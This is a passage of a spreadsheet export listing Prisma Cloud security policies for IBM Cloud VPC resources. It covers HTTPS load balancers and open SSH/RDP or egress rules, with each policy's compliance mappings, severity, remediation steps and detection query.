          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-loadbalancer' AND json.rule = profile.family equal ignore case application and operating_status equal ignore case online and pools[?any( health_monitor.type does not equal ignore case https )] exists</t>
        </is>
      </c>
      <c r="AA3360" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3360" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3360" t="inlineStr">
        <is>
          <t>PC-IBM-LBV-989</t>
        </is>
      </c>
      <c r="AD3360" t="b">
        <v>1</v>
      </c>
      <c r="AE3360" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3360" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG336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0" t="inlineStr">
        <is>
          <t>f424fd55-5ebd-4477-8b4c-ff2a955e5b4d</t>
        </is>
      </c>
      <c r="AI3360" t="inlineStr">
        <is>
          <t>b46a5725-e981-467a-bc45-9f665686b449</t>
        </is>
      </c>
      <c r="AJ3360" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3360" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3361">
      <c r="A3361" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, GDPR, DORA, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, SOC 2, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B3361" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3361" s="2" t="inlineStr"/>
      <c r="D3361" t="inlineStr"/>
      <c r="E3361" t="inlineStr"/>
      <c r="F3361" t="inlineStr"/>
      <c r="G3361" t="b">
        <v>1</v>
      </c>
      <c r="H33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1" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3361" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3361" t="inlineStr">
        <is>
          <t>IBM Cloud Application Load Balancer for VPC uses HTTP backend pool instead of HTTPS (SSL &amp; TLS)</t>
        </is>
      </c>
      <c r="L3361" t="inlineStr"/>
      <c r="M3361" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3361" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3361" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3361" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3361" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R3361" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S3361" t="inlineStr"/>
      <c r="T3361" t="b">
        <v>0</v>
      </c>
      <c r="U3361" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3361" t="inlineStr">
        <is>
          <t>ibm-vpc-loadbalancer</t>
        </is>
      </c>
      <c r="W3361" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Application Load Balancer for VPC, which has been using http backend pools instead of HTTPS. HTTPS pool uses TLS(SSL) to encrypt normal HTTP requests and responses. It is highly recommended to use application load balancers with HTTPS backend pools for additional security.</t>
        </is>
      </c>
      <c r="X3361" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Load balancers'
3. Select the 'Load balancer' reported in the alert
4. Under 'Back-end pools' tab, click on three dots on the right corner of a row containing back-end pool with protocol besides HTTPS.
5. In the 'Edit back-end pool' screen, under 'Protocol' dropdown, select 'HTTPS'.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y3361" t="inlineStr"/>
      <c r="Z3361" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-loadbalancer' AND json.rule = profile.family equal ignore case "application" and operating_status equal ignore case "online" and pools[?any( protocol does not equal ignore case "https" )] exists</t>
        </is>
      </c>
      <c r="AA3361" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3361" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3361" t="inlineStr">
        <is>
          <t>PC-IBM-LBV-974</t>
        </is>
      </c>
      <c r="AD3361" t="b">
        <v>1</v>
      </c>
      <c r="AE3361" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3361" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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1" t="inlineStr">
        <is>
          <t>e71b55d3-7b8c-4b7a-a448-df40514ecf08</t>
        </is>
      </c>
      <c r="AI3361" t="inlineStr">
        <is>
          <t>4e4c0477-c92f-4ef1-b628-02284e4943de</t>
        </is>
      </c>
      <c r="AJ3361" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3361" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3362">
      <c r="A3362" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, GDPR, DORA, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, SOC 2, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B3362" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3362" s="2" t="inlineStr"/>
      <c r="D3362" t="inlineStr"/>
      <c r="E3362" t="inlineStr"/>
      <c r="F3362" t="inlineStr"/>
      <c r="G3362" t="b">
        <v>1</v>
      </c>
      <c r="H336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2" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3362" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3362" t="inlineStr">
        <is>
          <t>IBM Cloud Application Load Balancer for VPC not configured with HTTPS Listeners</t>
        </is>
      </c>
      <c r="L3362" t="inlineStr"/>
      <c r="M3362" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3362" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3362" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3362" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3362" t="inlineStr">
        <is>
          <t>Technological Controls</t>
        </is>
      </c>
      <c r="R3362" t="inlineStr">
        <is>
          <t>A8.1</t>
        </is>
      </c>
      <c r="S3362" t="inlineStr"/>
      <c r="T3362" t="b">
        <v>0</v>
      </c>
      <c r="U3362" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3362" t="inlineStr">
        <is>
          <t>ibm-vpc-loadbalancer</t>
        </is>
      </c>
      <c r="W3362" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Application Load Balancers for VPC that has different listener protocol instead of HTTPS. HTTPS listeners uses TLS(SSL) to encrypt normal HTTP requests and responses. It is highly recommended to use application load balancers with HTTPS listeners for additional security.</t>
        </is>
      </c>
      <c r="X3362" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console 
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Load balancers'
3. Select the 'Load balancers' reported in the alert
4. Under 'Front-end listeners' tab, click on three dots on the right corner of a row containing listener with protocol other than HTTPS. Then click on 'Edit'.
5. If the protocol is 'TCP', please delete the listener by clicking on three dots on the right corner. Then click on 'Delete'.
6. Click on 'Create listener'.
7. In the 'Edit front-end listener' screen, select 'HTTPS' from the 'Protocol' dropdown.
8. Under 'Secrets Manager' please select an instance and select an SSL 'Certificate'. Make sure that the load balancer is authorised to access the SSL certificate.
9. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y3362" t="inlineStr"/>
      <c r="Z3362" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-loadbalancer' AND json.rule = listeners[?any( protocol does not equal ignore case https AND https_redirect does not exist )] exists</t>
        </is>
      </c>
      <c r="AA3362" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3362" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3362" t="inlineStr">
        <is>
          <t>PC-IBM-LBV-992</t>
        </is>
      </c>
      <c r="AD3362" t="b">
        <v>1</v>
      </c>
      <c r="AE3362" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3362" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG336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2" t="inlineStr">
        <is>
          <t>6344a891-ca41-4b18-8c24-84adbec4019a</t>
        </is>
      </c>
      <c r="AI3362" t="inlineStr">
        <is>
          <t>34f9ef32-1cc8-457e-a153-e891c83f5b79</t>
        </is>
      </c>
      <c r="AJ3362" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3362" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3363">
      <c r="A3363" t="inlineStr">
        <is>
          <t>TX-RAMP Level 1, CIS v1.1.0 (IBM Cloud) Level 1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, TX-RAMP Level 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3363" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3363" s="2" t="inlineStr"/>
      <c r="D3363" t="inlineStr"/>
      <c r="E3363" t="inlineStr"/>
      <c r="F3363" t="inlineStr"/>
      <c r="G3363" t="b">
        <v>1</v>
      </c>
      <c r="H33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3" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3363" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3363" t="inlineStr">
        <is>
          <t>IBM Cloud VPC ACL allow ingress rule from 0.0.0.0/0 to SSH port</t>
        </is>
      </c>
      <c r="L3363" t="inlineStr"/>
      <c r="M3363" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3363" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3363" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3363" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3363" t="inlineStr">
        <is>
          <t>TA0007</t>
        </is>
      </c>
      <c r="R3363" t="inlineStr">
        <is>
          <t>T1046 - Network Service Discovery (TA0007)</t>
        </is>
      </c>
      <c r="S3363" t="inlineStr"/>
      <c r="T3363" t="b">
        <v>0</v>
      </c>
      <c r="U3363" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3363" t="inlineStr">
        <is>
          <t>ibm-vpc-network-acl</t>
        </is>
      </c>
      <c r="W3363" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud VPC Access Control List which are having ingress rule that allows traffic from 0.0.0.0/0 to SSH port. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. It is recommended to review VPC ACL rules to ensure that your resources are not exposed. As a best practice, restrict SSH solely to known static IP addresses.</t>
        </is>
      </c>
      <c r="X3363" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the VPC ACL reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Access Control Lists'
3. Select the 'Access Control Lists' reported in the alert
4. Under 'Inbound rules'
5. Click on three dots on the right corner of a row containing rule that has a port range value of ALL or a port range that includes port 22 and has a Source of 0.0.0.0/0
6. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3363" t="inlineStr"/>
      <c r="Z3363" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-network-acl' AND json.rule = rules[?any( source equals "0.0.0.0/0" and direction equals "inbound" and action equals "allow" and ( (protocol equals "tcp" and (( destination_port_max greater than 22 and destination_port_min less than 22 ) or ( destination_port_max equals 22 and destination_port_min equals 22 ))) or protocol equals "all" ))] exists</t>
        </is>
      </c>
      <c r="AA3363" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3363" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3363" t="inlineStr">
        <is>
          <t>PC-IBM-NET-964</t>
        </is>
      </c>
      <c r="AD3363" t="b">
        <v>1</v>
      </c>
      <c r="AE3363" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3363" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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3" t="inlineStr">
        <is>
          <t>435f829b-6087-491d-84ce-e30c37561dc8</t>
        </is>
      </c>
      <c r="AI3363" t="inlineStr">
        <is>
          <t>67b8ea9e-1409-4c5a-9c56-1289b48acc1b</t>
        </is>
      </c>
      <c r="AJ3363" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3363" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3364">
      <c r="A3364" t="inlineStr">
        <is>
          <t>CIS v1.1.0 (IBM Cloud) Level 1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3364" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3364" s="2" t="inlineStr"/>
      <c r="D3364" t="inlineStr"/>
      <c r="E3364" t="inlineStr"/>
      <c r="F3364" t="inlineStr"/>
      <c r="G3364" t="b">
        <v>1</v>
      </c>
      <c r="H33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4" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3364" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3364" t="inlineStr">
        <is>
          <t>IBM Cloud VPC ACL allow ingress rule from 0.0.0.0/0 to RDP port</t>
        </is>
      </c>
      <c r="L3364" t="inlineStr"/>
      <c r="M3364" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3364" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3364" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3364" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3364" t="inlineStr">
        <is>
          <t>TA0007</t>
        </is>
      </c>
      <c r="R3364" t="inlineStr">
        <is>
          <t>T1046 - Network Service Discovery (TA0007)</t>
        </is>
      </c>
      <c r="S3364" t="inlineStr"/>
      <c r="T3364" t="b">
        <v>0</v>
      </c>
      <c r="U3364" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3364" t="inlineStr">
        <is>
          <t>ibm-vpc-network-acl</t>
        </is>
      </c>
      <c r="W3364" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud VPC Access Control List which are having ingress rule that allows traffic from 0.0.0.0/0 to RDP port. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. It is recommended to review VPC ACL rules to ensure that your resources are not exposed. As a best practice, restrict RDP solely to known static IP addresses.</t>
        </is>
      </c>
      <c r="X3364" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the VPC ACL reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Access Control Lists'
3. Select the 'Access Control Lists' reported in the alert
4. Under 'Inbound rules'
5. Click on three dots on the right corner of a row containing rule that has a port range value of ALL or a port range that includes port 3389 and has a Source of 0.0.0.0/0
6. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3364" t="inlineStr"/>
      <c r="Z3364" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-network-acl' AND json.rule = rules[?any( source equals "0.0.0.0/0" and direction equals "inbound" and action equals "allow" and ( (protocol equals "tcp" and (( destination_port_max greater than 3389 and destination_port_min less than 3389 ) or ( destination_port_max equals 3389 and destination_port_min equals 3389 ))) or protocol equals "all" ))] exists</t>
        </is>
      </c>
      <c r="AA3364" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3364" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3364" t="inlineStr">
        <is>
          <t>PC-IBM-NET-968</t>
        </is>
      </c>
      <c r="AD3364" t="b">
        <v>1</v>
      </c>
      <c r="AE3364" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3364" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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4" t="inlineStr">
        <is>
          <t>38a4f1da-6cbd-41ca-83d1-4d1aa5111643</t>
        </is>
      </c>
      <c r="AI3364" t="inlineStr">
        <is>
          <t>aae90432-c70c-4888-a689-6ce3c3fa03db</t>
        </is>
      </c>
      <c r="AJ3364" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3364" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3365">
      <c r="A3365" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, ISO/IEC 27001:2022, NIST 800-53 Rev 5, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SOC 2, SOC 2, TX-RAMP Level 1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B3365" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3365" s="2" t="inlineStr"/>
      <c r="D3365" t="inlineStr"/>
      <c r="E3365" t="inlineStr"/>
      <c r="F3365" t="inlineStr"/>
      <c r="G3365" t="b">
        <v>1</v>
      </c>
      <c r="H33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5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3365" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3365" t="inlineStr">
        <is>
          <t>IBM Cloud ACL for VPC with overly permissive egress rule</t>
        </is>
      </c>
      <c r="L3365" t="inlineStr"/>
      <c r="M3365" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3365" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3365" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3365" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3365" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R3365" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S3365" t="inlineStr"/>
      <c r="T3365" t="b">
        <v>0</v>
      </c>
      <c r="U3365" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3365" t="inlineStr">
        <is>
          <t>ibm-vpc-network-acl</t>
        </is>
      </c>
      <c r="W3365" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud VPC Access Control List which are having overly permissive outbound rules allowing outgoing traffic to internet (0.0.0.0/0). ACL contains a list of security rules that allow or deny inbound or outbound network traffic based on source or destination IP address, port, and protocol. As a best practice, it is recommended to configure ACL to restrict traffic to known destination on authorised protocols and ports.</t>
        </is>
      </c>
      <c r="X3365" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the VPC ACL reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Access control lists'
3. Select the Access control list reported in the alert
4. Go to 'Outbound rules' under 'Rules' tab
5. Click on three dots on the right corner of a row containing rule that has 'Destination Type' as 'Any' or 'IP or CIDR' as '0.0.0.0/0'
6. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3365" t="inlineStr"/>
      <c r="Z3365" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-network-acl' AND json.rule = rules[?any( action equals allow and direction equals outbound and destination equals 0.0.0.0/0 )] exists</t>
        </is>
      </c>
      <c r="AA3365" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3365" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3365" t="inlineStr">
        <is>
          <t>PC-IBM-NET-1015</t>
        </is>
      </c>
      <c r="AD3365" t="b">
        <v>1</v>
      </c>
      <c r="AE3365" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3365" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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5" t="inlineStr">
        <is>
          <t>6558b2a4-f490-41d3-a309-537e2e765ca8</t>
        </is>
      </c>
      <c r="AI3365" t="inlineStr">
        <is>
          <t>43b44a8c-7ff7-47f8-b029-02902010f326</t>
        </is>
      </c>
      <c r="AJ3365" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3365" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3366">
      <c r="A3366" t="inlineStr">
        <is>
          <t>HIPAA, CIS v1.1.0 (IBM Cloud) Level 1, NIST CSF v2.0, TX-RAMP Level 1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev 5, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, CRI Profile v2.0, GDPR, SOC 2, TX-RAMP Level 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3366" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3366" s="2" t="inlineStr"/>
      <c r="D3366" t="inlineStr"/>
      <c r="E3366" t="inlineStr"/>
      <c r="F3366" t="inlineStr"/>
      <c r="G3366" t="b">
        <v>1</v>
      </c>
      <c r="H33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6" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3366" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3366" t="inlineStr">
        <is>
          <t>IBM Cloud Security Group allow all traffic on SSH port (22)</t>
        </is>
      </c>
      <c r="L3366" t="inlineStr"/>
      <c r="M3366" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3366" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3366" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3366" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3366" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3366" t="inlineStr">
        <is>
          <t>SC-07-05 : Boundary Protection | Deny by Default — Allow by Exception</t>
        </is>
      </c>
      <c r="S3366" t="inlineStr"/>
      <c r="T3366" t="b">
        <v>0</v>
      </c>
      <c r="U3366" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3366" t="inlineStr">
        <is>
          <t>ibm-vpc-network-security-group</t>
        </is>
      </c>
      <c r="W3366" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Security groups that allow all traffic on SSH port 22. Doing so, may allow a bad actor to brute force their way into the system and potentially get access to the entire network. Review your list of security group rules to ensure that your resources are not exposed. As a best practice, restrict SSH solely to known static IP addresses. Limit the access list to include known hosts, services, or specific employees only</t>
        </is>
      </c>
      <c r="X3366" t="inlineStr">
        <is>
          <t>Before making any changes, please check the impact to your applications/services. If the Security Groups reported indeed need to restrict all traffic, follow the instructions below:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'VPC Infrastructure' and then 'Security Groups'
3. Select the 'Security Groups' reported in the alert
4. Go to 'Inbound rules' under 'Rules' tab
5. Click on three dots on the right corner of a row containing rule that has 'Source type' as 'Any' and 'Value' as 22 (or range containing 22)
6. Click on 'Delete'</t>
        </is>
      </c>
      <c r="Y3366" t="inlineStr"/>
      <c r="Z3366" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-vpc-network-security-group' AND json.rule = rules[?any( remote.cidr_block equals "0.0.0.0/0" and direction equals "inbound" and ( protocol equals "all" or ( protocol equals "tcp" and ( port_max greater than 22 and port_min less than 22 ) or ( port_max equals 22 and port_min equals 22 ))))] exists</t>
        </is>
      </c>
      <c r="AA3366" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3366" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3366" t="inlineStr">
        <is>
          <t>PC-IBM-NET-966</t>
        </is>
      </c>
      <c r="AD3366" t="b">
        <v>1</v>
      </c>
      <c r="AE3366" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3366" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG33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6" t="inlineStr">
        <is>
          <t>39141cd8-4b19-4aa0-9697-1cdf2b6ebc80</t>
        </is>
      </c>
      <c r="AI3366" t="inlineStr">
        <is>
          <t>5a4fcc81-5481-4d37-b96b-eb87333d3b32</t>
        </is>
      </c>
      <c r="AJ3366" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3366" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3367">
      <c r="A3367" t="inlineStr">
        <is>
          <t>HIPAA, NIST CSF v2.0, TX-RAMP Level 1, NIST 800-53 Rev 5, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, Telecommunications Security Act - TSA, ISO/IEC 27001:2022, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ITSG-33, CRI Profile v2.0, GDPR, SOC 2, TX-RAMP Level 2, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3367" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3367" s="2" t="inlineStr"/>
      <c r="D3367" t="inlineStr"/>
      <c r="E3367" t="inlineStr"/>
      <c r="F3367" t="inlineStr"/>
      <c r="G3367" t="b">
        <v>1</v>
      </c>
      <c r="H33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7" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3367" t="inlineStr">
        <is>
          <t>ibm-vpc</t>
        </is>
      </c>
      <c r="K3367" t="inlineStr">
        <is>
          <t>IBM Cloud Default Security Group allow all traffic on SSH port (22)</t>
        </is>
      </c>
      <c r="L3367" t="inlineStr"/>
      <c r="M3367" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3367" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3367" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3367" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3367" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3367" t="inlineStr">
        <is>
          <t>SC-07-05 : Boundary Protection | Deny by Default — Allow by Exception</t>
        </is>
      </c>
      <c r="S3367" t="inlineStr"/>
      <c r="T3367" t="b">
        <v>0</v>
      </c>
      <c r="U3367" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3367" t="inlineStr">
        <is>
          <t>ibm-vpc-network-security-group</t>
        </is>
      </c>
      <c r="W3367" t="inlineStr">
        <is>
